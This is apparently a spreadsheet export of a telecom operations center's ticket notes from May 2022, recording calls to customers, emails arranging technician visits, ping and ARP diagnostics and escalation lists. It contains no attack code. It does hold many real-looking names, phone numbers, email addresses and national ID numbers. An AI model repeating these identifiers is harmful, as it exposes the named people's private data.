NOMBRE: A: 79438311
NÚMERO: 79438311
DURACIÓN: 0:02:01
ESTADO: MARCANDO
DETALLES: 79438311
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 23/05/2022 17:03:33</t>
  </si>
  <si>
    <t>F4572498</t>
  </si>
  <si>
    <t>CARLOS SORIANO 78186996 QUIEN COMUNICA A JOSUE PEREZ  QUIEN APOYA A REINCIAR LA PBX PARA QUE VUELVA A ENVIAR REGISTRO. LLAMADA DESDE VI-VO</t>
  </si>
  <si>
    <t>F4572509</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: LUNES, 23 DE MAYO DE 2022 18:02
PARA: ALBERTO LENIN CESPEDES GONZALEZ &lt;ALBERTO.CESPEDE@CLARO.COM.NI&gt;; WAGNER JOSUE POLANCO SANDOVAL &lt;WAGNER.POLANCO@CLARO.COM.GT&gt;; TELAMATICA@BACCREDOMATIC.NI &lt;TELAMATICA@BACCREDOMATIC.NI&gt;; G-TELEMATICA-NI-BAC (TELEMATICA@BACCREDOMATIC.NI) &lt;TELEMATICA@BACCREDOMATIC.NI&gt;
CC: CNOC.CLARONI &lt;CNOC.CLARONI@CLARO.COM.NI&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RE: 3254486 || ENLACE FO BAC GRANADA PRINCIPAL
*-*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSELLING  88675716 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001979270</t>
  </si>
  <si>
    <t>F4572510</t>
  </si>
  <si>
    <t xml:space="preserve">     SE ENVIA CORREO A CLIENTE
8900613T || AGE446
AXEL SAMUEL LOPEZ ORTIZ
BUENOS DÍAS ESTIMADOS.
BRINDANDO SEGUIMIENTO AL INCIDENTE REPORTADO CON EL ID  8900613T, SOLICITAMOS DE SU APOYO GESTIONANDO EL INGRESO A SUS INSTALACIONES, FAVOR DE INDICAR EN EL HORARIO Y EL DÍA QUE SE PODRÁ PRESENTAR PERSONAL TÉCNICO.
ADJUNTO LOS DATOS DEL PERSONAL:
NOMBRE                                                                         DPI
GODINEZ PEREZ CARLOS AUGUSTO          1626-33335-1001
MIRANDA CHANG JORGE FERNÁNDO      1813-64700-0920
JULIAN LOPEZ JOSE DANILO                        2082-73751-1106
ATENTAMENTE:</t>
  </si>
  <si>
    <t>F4572531</t>
  </si>
  <si>
    <t>##SE SIGUE SIN RESPUESTA DE CLIENTE ## SE DARA SEGUIMIENTO EL DIA DE MAÑANA EN HORARIO HABIL DE CL ##</t>
  </si>
  <si>
    <t>SE HA ENVIADO CORREO A CLIENTE. A LA ESPERA DE RESPUESTA- #SERVICIO UP ##
DE: MARIA ISABEL GODINEZ SAENZ &lt;MARIAI.GODINEZ@CLARO.COM.GT&gt;
ENVIADO: DOMINGO, 22 DE MAYO DE 2022 7:16
PARA: SAQITZ¿UNUN ULIL COJTI LOPEZ &lt;SAQITZUNUN.COJTI@CLARO.COM.GT&gt;; WILSON_HERNANDEZ@CACORPORACION.COM &lt;WILSON_HERNANDEZ@CACORPORACION.COM&gt;; ACAROLINA_VELASQUEZ@CACORPORACION.COM &lt;ACAROLINA_VELASQUEZ@CACORPORACION.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
CC: ISO.CNOC.ACCESOS &lt;ISOCNOCACCESOS@CLARO.COM.GT&gt;; CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;
ASUNTO: RE: SD1127852// PILOTO 22837700// COBRANZAS Y ASESORIAS CORPORATIVAS
BUEN DÍA ESTIMADOS, FAVOR REALIZAR PRUEBAS Y CONFIRMAR FUNCIONAMIENTO DEL SERVICIO PARA PROCEDER CON EL CIERRE DEL TICKET.
QUEDAMOS A LA ESPERA DE SUS COMENTARIOS, FAVOR SU APOYO.
SALUDOS,
 ¯¿"*°¿¿°*"¿¯`¿¯¿"*°¿¿°*"¿¯`
¡TE CUIDAS TÚ, NOS CUIDAMOS TODOS! &amp;#xd83d;&amp;#xde37;</t>
  </si>
  <si>
    <t>F4572534</t>
  </si>
  <si>
    <t>**SE LLAMA A DANY RECINOS AL 23569201 CONTESTA AGENTE GOMEZ  QUIEN INDICA QUE SI SE REALIZARON LAS PRUEBAS DE PRIMER NIVEL PERO NO FUNCIONO AUN SIGUEN CON INCONVENIENTES SE SOLICITAN DATOS DE VISITA **
HORARIO DE ATENCION: LAS 24 HRS
GESTION DE PERMISOS: SOLO IDENTIFICADOS
DIRECCION: AVENIDA COMERCIA BARRIO EL CENTRO DULCE NOMBRE DE MARIA FRENTE A LA ALCALDIA MUNICIPAL .
ATENDERA EN SITIO: AGENTE GOMEZ SERRANO
ID 1001559846
**</t>
  </si>
  <si>
    <t>F4572539</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE SOLICITANDO PERMISOS
DE: OMAR ALBERTO OCHOA HID &lt;OALBERTO.OCHOA@CLARO.COM.GT&gt;ENVIADO: SÁBADO, 21 DE MAYO DE 2022 12:59PARA: FASCENCIO@RED.COM.SV &lt;FASCENCIO@RED.COM.SV&gt;CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; SAQITZ¿UNUN ULIL COJTI LOPEZ &lt;SAQITZUNUN.COJTI@CLARO.COM.GT&gt;ASUNTO: INTELFON || 732300001T || E1 || PUERTO QUETZAL ||
BUENAS TARDES ESTIMADO CLIENTE,
SE DANDO SEGUIMIENTO AL ENLACE E1 DE CLIENTE INTELFON CON ID 732300001T SE SOLICITA GESTIONAR ACCESOS PARA EL PERSONAL TÉCNICO ASIGNADO A LA ATENCIÓN DE LA FALLA, FAVOR INDICAR EL DÍA Y LA HORA A LA QUE SE RECIBIRÁ A PERSONAL DE CLARO. QUEDAMOS A LA ESPERA DE SUS COMENTARIOS.
LUIS GUILLERMO ALVARADO                       1913 92405 0101
JAYRON ALEJANDRO DONIS BAUTISTA       1707 66713 0608
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>SE RESPONDE CORREO A CLIENTE
DE: OMAR ALBERTO OCHOA HID &lt;OALBERTO.OCHOA@CLARO.COM.GT&gt;ENVIADO: LUNES, 23 DE MAYO DE 2022 15:35PARA: OBED HERNANDEZ &lt;OHERNANDEZ@RED.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; KANDY KRYSTINA CORONADO RAMON &lt;KANDY.CORONADO@CLARO.COM.GT&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; JUAN BARRERA &lt;JBARRERA@RED.COM.SV&gt;CC: MSO &lt;MSO@RED.COM.SV&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; MARCO SOLARES &lt;MSOLARES@RED.COM.GT&gt;ASUNTO: RE: PUERTO QUETZAL CID: C-0081200201
BUENAS TARDES ESTIMADO CLIENTE,
LAMENTAMOS EL RETARDO EN LA COORDINACIÓN DE LA VISITA, EL PERSONAL TÉCNICO SE ENCUENTRA LEJOS DEL SITIO POR LO QUE ESTARÍAN LLEGANDO EN APROXIMADAMENTE 1 HORA Y MEDIA AL LUGAR, POR LO QUE AGRADECEMOS SU AMABLE ESPERA. SE REALIZÓ UNA REVISIÓN EN EL LUGAR, HASTA DONDE CORRESPONDE Y SE TIENE ACCESO DE PARTE DE CLARO SE OBSERVÓ ACTIVO Y SIN ALARMAS, ADJUNTO NOMBRES DE PERSONAL QUE SE DIRIGE AL SITIO, QUEDAMOS A LA ESPERA DE SUS COMENTARIOS.
MARVIN CELADA   796404
JAIRON DONIS        559567
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 24 DE MAYO DE 2022 10:33
PARA: OMAR ALBERTO OCHOA HID &lt;OALBERTO.OCHOA@CLARO.COM.GT&gt;; OBED HERNANDEZ &lt;OHERNANDEZ@RED.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; KANDY KRYSTINA CORONADO RAMON &lt;KANDY.CORONADO@CLARO.COM.GT&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; JUAN BARRERA &lt;JBARRERA@RED.COM.SV&gt;
CC: MSO &lt;MSO@RED.COM.SV&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; MARCO SOLARES &lt;MSOLARES@RED.COM.GT&gt;
ASUNTO: RE: PUERTO QUETZAL CID: C-0081200201
*-*-*-*-*</t>
  </si>
  <si>
    <t>SE ENVIA MENSAJE A CLIENTE INFORMANDOLE DE LO ENCONTRADO POR TECNICOS DE LADO DE CLIENTE, DENTRO DEL NODO XT (CLIENTE TIENE UNA CASETA INSTALADA ADENTRO DONDE SE ENCUENTRAN SUS EQUIPOS.
DE: OMAR ALBERTO OCHOA HID &lt;OALBERTO.OCHOA@CLARO.COM.GT&gt;
ENVIADO: LUNES, 23 DE MAYO DE 2022 17:35PARA: OBED HERNANDEZ &lt;OHERNANDEZ@RED.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; KANDY KRYSTINA CORONADO RAMON &lt;KANDY.CORONADO@CLARO.COM.GT&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; JUAN BARRERA &lt;JBARRERA@RED.COM.SV&gt;CC: MSO &lt;MSO@RED.COM.SV&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; MARCO SOLARES &lt;MSOLARES@RED.COM.GT&gt;ASUNTO: RE: PUERTO QUETZAL CID: C-0081200201
BUENAS TARDES ESTIMADO CLIENTE,
SE REALIZA REVISIONES EN CONJUNTO Y SE VALIDA QUE LOS EQUIPOS PERTENECIENTES A INTELFON SE ENCUENTRAN DAÑADOS, POR PARTE DEL CLIENTE EL TÉCNICO MARCO SOLARES REALIZA REVISIÓN, EQUIPOS DE CLARO SE ENCUENTRAN FUNCIONANDO BIEN. QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>SE REENVÍA CORREO A CLIENTE CON EL NÚMERO DE TICKET Y EL SEGUIMIENTO DADO.
ASUNTO: PUERTO QUETZAL FUERA DE SERVICIO CID: C-0081200201</t>
  </si>
  <si>
    <t>***--- SE ENVÍA CORREO A CL PARA CONSULTAR CONTACTOS O QUE NOS APOYE CON LA COORDINACIÓN DE ACCESOS --***
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: DOMINGO, 22 DE MAYO DE 2022 02:28
PARA: JUAN BARRERA &lt;JBARRERA@RED.COM.SV&gt;
CC: MSO &lt;MSO@RED.COM.SV&gt;; OBED HERNANDEZ &lt;OHERNANDEZ@RED.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: PUERTO QUETZAL CID: C-0081200201
BUENOS DÍAS ESTIMADO SR. BARRERA.
                RESPECTO A SU SOLICITUD, ACTUALMENTE SE CUENTA CON EL TICKET SD1127854 PARA LA REVISIÓN.
PERSONAL A CARGO NOS INDICA QUE ES NECESARIO COORDINAR VISITA TÉCNICA, PODRÍA APOYARNOS EN INDICAR LOS CONTACTOS EN SITIO O REALIZANDO LA COORDINACIÓN DE ACCESOS.
CUALQUIER CONSULTA QUEDAMOS ALA ORDEN.
SALUDOS.</t>
  </si>
  <si>
    <t>F4572540</t>
  </si>
  <si>
    <t>--- SE DEJA EN CONFERENCIA A ISRAEL GONZALEZ 52988845 (CLIENTE) Y MARLON RAMOS (GESTOR ASIGNADO). ...
RESULTADO: CONTESTADA
NOMBRE: 52988845
NÚMERO: 52988845
INICIO: HOY, 12:21
FIN: HOY, 12:26
DURACIÓN: 5:11
ID DE LLAMADA: 1001378534
RESULTADO: LLAMADA HECHA
NOMBRE: JOSE MANUEL OCHOA URBINA
NÚMERO: 5028
INICIO: HOY, 12:23
FIN: HOY, 12:24
DURACIÓN: 0:51
ID DE LLAMADA: 1001379060
RESULTADO: LLAMADA HECHA
NOMBRE: 35532157
NÚMERO: 35532157
INICIO: HOY, 12:24
FIN: HOY, 12:26
DURACIÓN: 1:33
ID DE LLAMADA: 1001379460
RESULTADO: CONTESTADA
NOMBRE: PARTICIPANTE DE CONFERENCIA
NÚMERO:
INICIO: HOY, 12:26
FIN: HOY, 12:26
DURACIÓN: 0:12
ID DE LLAMADA: 1001379764
...</t>
  </si>
  <si>
    <t>TICKET PENDIENTE POR ELABORACIÓN DEL RFO, LA SOLICITUD SE HIZO EL DÍA DE AYER DOMINGO 22, EN ESPERA DE LAS 48/72 HORAS HÁBILES, SE ESPERA TENERLO EN EL TRANSCURSO DE ESTA SEMANA.</t>
  </si>
  <si>
    <t>F4572549</t>
  </si>
  <si>
    <t>**SE LLAMA AL SR. MARIO VASQUEZ AL 98969076  CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 1001607022
**</t>
  </si>
  <si>
    <t>F4572557</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A LA ESPARE DE VALIDACION:
ASUNTO: SOLICITUD DE SOPORTE ::: ID LOCAL 99900372T ### ::: TICKET CNOC IMGRC006945 ### ::: LINK DOWN</t>
  </si>
  <si>
    <t>F4572558</t>
  </si>
  <si>
    <t>**SE LLAMA AL SR. OLVIN RODRIGUEZ AL 31523556 NO RESPONDE, ENVIA A BUZON SE INTENTARA LUEGO **
ID 1001564296
**</t>
  </si>
  <si>
    <t>SE LLAMAA CLIENTE 31909804 - 22410049 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001861637 - 1001861886</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA GESTIONAR LOS PERMISOS DE PERSONAL TECNICO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: LUNES, 23 DE MAYO DE 2022 10:29
PARA: OLVIN RODRIGUEZ &lt;OLVIN.RODRIGUEZ@FARSIMAN.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; NIVEL 2 VIP &lt;NIVEL2.VIP@CLARO.COM.HN&gt;; CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;; AXEL SAMUEL LOPEZ ORTIZ &lt;AXELS.LOPEZ@CLARO.COM.GT&gt;
ASUNTO: GESTION DE PERMISOS || SUPER FARMACIA SIMAN || 628737OH || SD1127857
BUEN DÍA
SOLICITAMOS PUEDA GESTIONARSE EL ACCESO A PERSONAL TÉCNICO PARA EL INGRESO A SUS INSTALACIONES PARA REALIZAR LAS REPARACIONES NECESARIAS.
DOUGLAS ANDINO 0801-1980-1232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72572</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUIS UMANZOR 50378590139 QUIEN COMENTA QUE LUEGO DE LA ULTIMA LLAMADA CONTINUARON REALIZANDO PRUEBAS Y VALIDA QUE EL E1 YA SE ENCUENTRA FUNCIONANDO, YA PUEDEN REALIZAR LLAMADAS A LOS NÚMEROS QUE INICIAN CON 9. AUTORIZA EL CIERRE DEL CASO. LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>INFORMA CLIENTE LUIS UMANZOR 50378590139 (ENCARGADO DE LA PBX) QUE EL INCONVENIENTE QUE PRESENTAN ES EN LLAMADAS SALIENTES DESDE EL GDN, ESPECÍFICAMENTE EN NÚMEROS QUE INICIAN CON 9, BRINDA NÚMERO DE EJEMPLO, 50496887231, CLIENTE INDICA QUE SE ENCUENTRAN REALIZANDO PRUEBAS. LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE MAICOL MALDONADO 33101101, INDICA QUE NO SE ENCUENTRA EN SITIO, INDICA QUE LE REPORTARON QUE NO GENERAN NI RECIBEN LLAMADAS PERO PARA MAS DETALLES SOLICITA LLAMAR A LUIS UMANZOR 50378590139</t>
  </si>
  <si>
    <t>F4572588</t>
  </si>
  <si>
    <t>SSE RECIBE CORREO DE PARTE DEL CLIENTE SOLICITANDO MONITOREO HASTA LAS 15:00 HRS Y AL FINALIZAR MONITOREO ENVIARLE GRAFICAS DE CONSUMO, SE LE RESPONDE Y NOTIFICA A luis.ixcot VIA SKYPE PARA EL CAMBIO DE ETAPA
De: Walter Anibal Reyes [mailto:walter.reyes@somoscmi.com]
Enviado el: sábado, 21 de mayo de 2022 12:43
Para: DARWIN HUSSEIN ESPANA NORIEGA; tecnicorpo; cnocca; Grupo N1
CC: helpdesk@campero.com; NOC Alimentos
Asunto: Re: C641 - Enlace Claro - con ID 625900228; 625900030.
Muy buen día, gracias por el apoyo, ppr estar en hora picofavor dejar en monitoreo los enlaces hasta las tres de la tarde y compartir nuevas gráficas.
SALUDOS,</t>
  </si>
  <si>
    <t>F4572622</t>
  </si>
  <si>
    <t>SE TERMINA LLAMADA CON EL AREA DE MONITOREO DE CAJEROS, RESPONDE DANIEL QUIEN ME INDICA QUE SE ENVIARA SUPERVISOR PARA QUE REVISE EQUIPOS Y CONEXIONES DEL ENLACE PRINCIPAL.
RESULTADO: LLAMADA HECHA
NOMBRE: 24207212
NÚMERO: 24207212
INICIO: HOY, 17:08
FIN: HOY, 17:14
DURACIÓN: 6:14
ID DE LLAMADA: 1001757353</t>
  </si>
  <si>
    <t>F4572625</t>
  </si>
  <si>
    <t>SE HABLÓ CON EDWIN CURACAN/CLIENTE 41498782 INDICA ENLACE OK, AUTORIZA CIERRE DEL TICKET.</t>
  </si>
  <si>
    <t>F4572628</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE JANNET PADILLA 22640972 PERO INDICA QUE SE ENCUENTRA OCUPADA, SOLICITA SE LE LLAME EN 30 MINUTOS. LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE JANNET PADILLA 22640972 UBICA EQUIPO ASMI54 EL CUAL ESTÁ SINCRONIZADO CON PWR VERDE Y SYNC 1 VERDE, SE LE SOLICITA SU APOYO PARA UBICAR SU PLANTA PBX</t>
  </si>
  <si>
    <t>CLIENTE UBICA PLANTA PBX PANASONIC Y LO REINICIA PERO E1 AUN CONTINÚA CAIDO. SE SOLICITARÁ APOYO PARA REVISAR LA REPISA</t>
  </si>
  <si>
    <t>F4572676</t>
  </si>
  <si>
    <t>JUAN PABLO MORALES BARRONDO
SÁB 21/05/2022 1:33 P.M.
ELEMENTOS ENVIADOS; BANDEJA DE ENTRADA
PARA:
JOSE.GAITAN@WALMART.COM;
CAM-CCINFR@WAL-MART.COM;
CNOCCA;
FONSECA BUSTAMANTE, KEVYN ANTONIO&lt;KEVYN.FONSECA@CLARO.COM.GT&gt;;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2676¿
ID: CONTR0001582915OC¿
IDENTIFICADOR DEL CLIENTE: CC_WALMART_CR_TIENDA_3123
FRENTE AL INA EN URBANIZACIÓN SANTA LUCÍA, PARAÍSO, CARTAGO¿
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIO.
SALUDOS.</t>
  </si>
  <si>
    <t>F4572678</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  ENCARGADO DE TURNO 79438305 NO CONTESTO IVR ENVIA A BUZON, SE NECESITA REALIZAR PRUEBAS N1, 1001404632.</t>
  </si>
  <si>
    <t>SR. MIGUEL 54436089  UBICA LOS EQUIPOS, CONFIRMA QUE ESTAN ENCENDIDOS, APLICO REINICIO CTC CONTINUA ALARMADO, ENLACE CONTINUA DOWN. SE PROCEDE A SOLICITAR APOYO DE PERSONAL TECNICO.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ENCARGADO DE TURNO AL 79438305 NO RESPONDE, SE INTENTARA LUEGO **
ID 1001654132
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WALTER ANIBAL REYES AL 45787911 INDICA QUE NO TIENE OTRO CONTACTO SOLO EL DEL SEÑOR GERBER TENIA, ESTARA SOLICITANDO OTRO NUMERO E INDICA QUE SIGAMOS CONTACTANDONOS AL PDV**
ID 1001573233
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CL ENCARGADO DE TURNO 79438305 NO RESPONDE, SE INTENTARA LUEGO **
ID 1001574488
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ENCARGADO DE TURNO AL 79438305 NO RESPONDE, SE INTENTARA LUEGO **
ID 1001613216
**</t>
  </si>
  <si>
    <t>***--- AUN NO HAY RESPUESTA DE CL POR LO QUE SE LLAMA A WALTER REYES 45787911 PERO NO CONTESTA --**
1001459911</t>
  </si>
  <si>
    <t>F4572726</t>
  </si>
  <si>
    <t>SE HABLÓ CON DIEGO MORA/CLIENTE 2243-7253 SE LE PIDE TELS DE PR, ME BRINDA LOS SIGUIENTES; 506 70191503 / 506 26971368, SE PROCEDERÁ A LLAMAR PARA CONTINUAR CON SEGUIMIENTO DEL TICKET.</t>
  </si>
  <si>
    <t>F4572778</t>
  </si>
  <si>
    <t>NO SE HA TENIDO APOYO DE CNOC CLARO A LO DICHO EN CRONO ANTERIOR, SE LES HACE RECORDATORIO DE NUEVO VÍA SKYPE MOVER TICKET A MONITOREO.</t>
  </si>
  <si>
    <t>F4572779</t>
  </si>
  <si>
    <t>SE ENVIO CORREO A CLIENTE.
JURGEN RENE BOCH CAAL
BUEN DÍA
ESTIMADO CLIENTE, POR ESTE MEDIO LE INFORMAMOS QUE OBSERVAMOS EL SERVICIO ACTIVO A NIVEL DE CLARO,  CON RESPECTO AL ENLACE CON ID: 8902585T  IGUAL FORMA LE COMPARTIMOS LOS RESULTADOS DE EQUIPOS ASOCIADOS POR PARTE DE SU RED LAN. CUALQUIER COMENTARIO O DUDA ESTAMOS ATENTOS.
PING -VPN TRANSFERENCIAS 10.218.51.18
  PING 10.218.51.18: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.218.51.18: BYTES=56 SEQUENCE=1 TTL=58 TIME=72 MS
    REPLY FROM 10.218.51.18: BYTES=56 SEQUENCE=2 TTL=58 TIME=69 MS
    REPLY FROM 10.218.51.18: BYTES=56 SEQUENCE=3 TTL=58 TIME=74 MS
    REPLY FROM 10.218.51.18: BYTES=56 SEQUENCE=4 TTL=58 TIME=69 MS
    REPLY FROM 10.218.51.18: BYTES=56 SEQUENCE=5 TTL=58 TIME=73 MS
  --- 10.218.51.18 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 69/71/74 MS
EQUIPO ASOCIADO POR PARTE DE LA RED LAN:
CC_TYT_GT_ATM4780 ARP+DUMP ETHERNET0/0
ARP ENTRIES FOR IP PROTOCOL
MAC ADDRESS           IP ADDRESS       TIMEOUT(MIN)
30-0E-D5-2E-36-D3     10.233.154.78    239
.</t>
  </si>
  <si>
    <t>F4572787</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALEXANDER GONZÁLEZ 22399709 CONTESTA EL SEÑOR WILMER MOLINA CLIENTE C0NFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 1001575859
**</t>
  </si>
  <si>
    <t>F4572801</t>
  </si>
  <si>
    <t xml:space="preserve">				
	WO OPEN                                			8:09
1/4	LUIS SANDRES           	89904245	2.5 HORAS	10:39:00
2/4	FRANKLIN BUESO  	89904208	3 HORAS	11:09:00
3/4	MANUEL LARIOS   	31921638	5 HORAS	13:09:00
4/4	PASTOR RAMIREZ  	33910016	6 HORAS	14:09:00</t>
  </si>
  <si>
    <t>F4572930</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 00 52 55 5174 5290 RESPONDEN PERO DEJAN EN ESPERA Y NO RETOMAN LA LLAMADA
-ID 1001600447</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5290 PERO NO RESPONDEN, SE INTENTARA LUEGO
-ID 1001675307</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 00 52 55 5174 5290 MENCIONA QUE YA OBSERVAN OPERATIVO EL SERVICIO
-ID 1001763274</t>
  </si>
  <si>
    <t>F4572976</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 00 52 55 5174 5290 CONTESTAN PERO DEJAN EN ESPERA Y NO RETOMAN LLAMADA SE INTENTARA LUEGO **
ID 1001583085
**</t>
  </si>
  <si>
    <t>F4572991</t>
  </si>
  <si>
    <t>SE DETIENE ESCALACIONES TECNICO EN SITIO QUEDA PC</t>
  </si>
  <si>
    <t>ID LLAMADA
1001487268</t>
  </si>
  <si>
    <t>SE CONTACTA MYNOR CASTILLO DEL 50001209 ID 1001466382 DONDE SE VALIDAN PRUEBAS PENDIENTES Y SE CONTACTA CON EL GESTOR RAMOS.MARLON AL 8126 ID 1001466611 PERO NO INGRESA ALGUN GESTOR, SE INTENTA NUEVAMENTE, SUCEDE LO MISMO ID 1001466743, SE ESCALA CON JUAN MANUEL CARDONA AL  41287321 ID SE LE BRINDA LA INFORMACION Y CONTACTA A OTRO GESTOR JURGEN
ID 1001466611
NOMBRE: A: SISTEMA
NÚMERO: 8126
DURACIÓN: 0:01:42
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
FECHA: 22/05/2022
HORA: 08:37:52
F4572991
SD1127942
ID 1001466743
NOMBRE: A: SISTEMA
NÚMERO: 8126
DURACIÓN: 0:02:02
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
FECHA: 22/05/2022
HORA08:40:35
F4572991
SD1127942
JURGEN
ID 1001466923
NOMBRE: A: 41287321
NÚMERO: 41287321
DURACIÓN: 0:01:52
ESTADO: CONECTADA
FECHA: 22/05/2022
HORA: 08:43:23
F4572991
SD1127942</t>
  </si>
  <si>
    <t>SE HABLA CON CLIENTE  MYNOR CASTILLO 50001209 || COMENTA QUE EN ESTE MOMENTO NO SE PUEDE VALIDAR YA QUE ESTAN REPARANDO, SE LE COMENTA QUE YA REALIZARON EL CAMBIO DE LOS EQUIPOS DAÑADOS, CLIENTE COMENTA QUE EL DARA SEGUIMEINTO YA QUE NO TIENEN NADA EN LA LAN CONECTADO EN ESTE INSTANTE PARA HACER MAS PRUEBAS</t>
  </si>
  <si>
    <t>SE LLAMA A SUPERVISOR EN REPETIDAS OCACIONES SIN TENER RESPUESTA
10001474889</t>
  </si>
  <si>
    <t>ASIGNACION DE TECNICO
FRANCISCO JAVIER ZEPEDA REYES
 45045611
IBM 790442</t>
  </si>
  <si>
    <t>SE CONECTAN EQUIPOS CON CABLEADO PROVISIONAL DE CLIENTE, YA QUE ESTAN REPARANDO EL CABLEADO ELECTRICO DAÑADO, PERSONAL TECNICO DE CLARO NECESITAN IR POR OTRO CABLE DE CONSOLA YA QUE EL QUE UTILIZARON NO ES RECONOCIDO POR PC, SE LE INDICA A CLIENTE EN SITIO QUE SE DEBEN DE TRASLADAR PARA RECOGE EL CABLE Y EL INDICA QUE ESTARAN TARBAJANDO 24 HORAS PARA RESTABLECER SUS LINEAS ELECTRICAS, TECNICO REGRESARA A CONFIGURAR EQUIPOS DE REMPLAZO</t>
  </si>
  <si>
    <t>TECNICO EN SITIO CLIENTE IMPROVISARA UNA EXTENCION PARA PODER DAR ENERGIA PROVISIONAL A LOS EQUIPOS PARA PRUEBAS,, DESCARGA DAÑA ETX-1 CISCO SI ENCIENDE</t>
  </si>
  <si>
    <t>F4573074</t>
  </si>
  <si>
    <t>|| SE ENVIA CORREO A CLIENTE SOLICITANDO VISITA EN CONJUNTO PARA EL DIA DE MAÑANA LUNES A LAS 10 AM || PENDIENTE CONFIRMEN
ERITO FERNANDO TECU XITUMUL
ASUNTO:VISITA TÉCNICA ATM_4828 || ID: 47503900T || 3A AVENIDA 5-23 ZONA 1 DE TECUN UMAN AYUTLA SAN MARCOS
BUENA TARDE ESTIMADOS 5B.
EN SEGUIMIENTO AL SERVICIO REPORTADO ATM_4828 || ID: 47503900T || 3A AVENIDA 5-23 ZONA 1 DE TECUN UMAN AYUTLA SAN MARCOS_BAM AGENCIA TECUN UMAN.
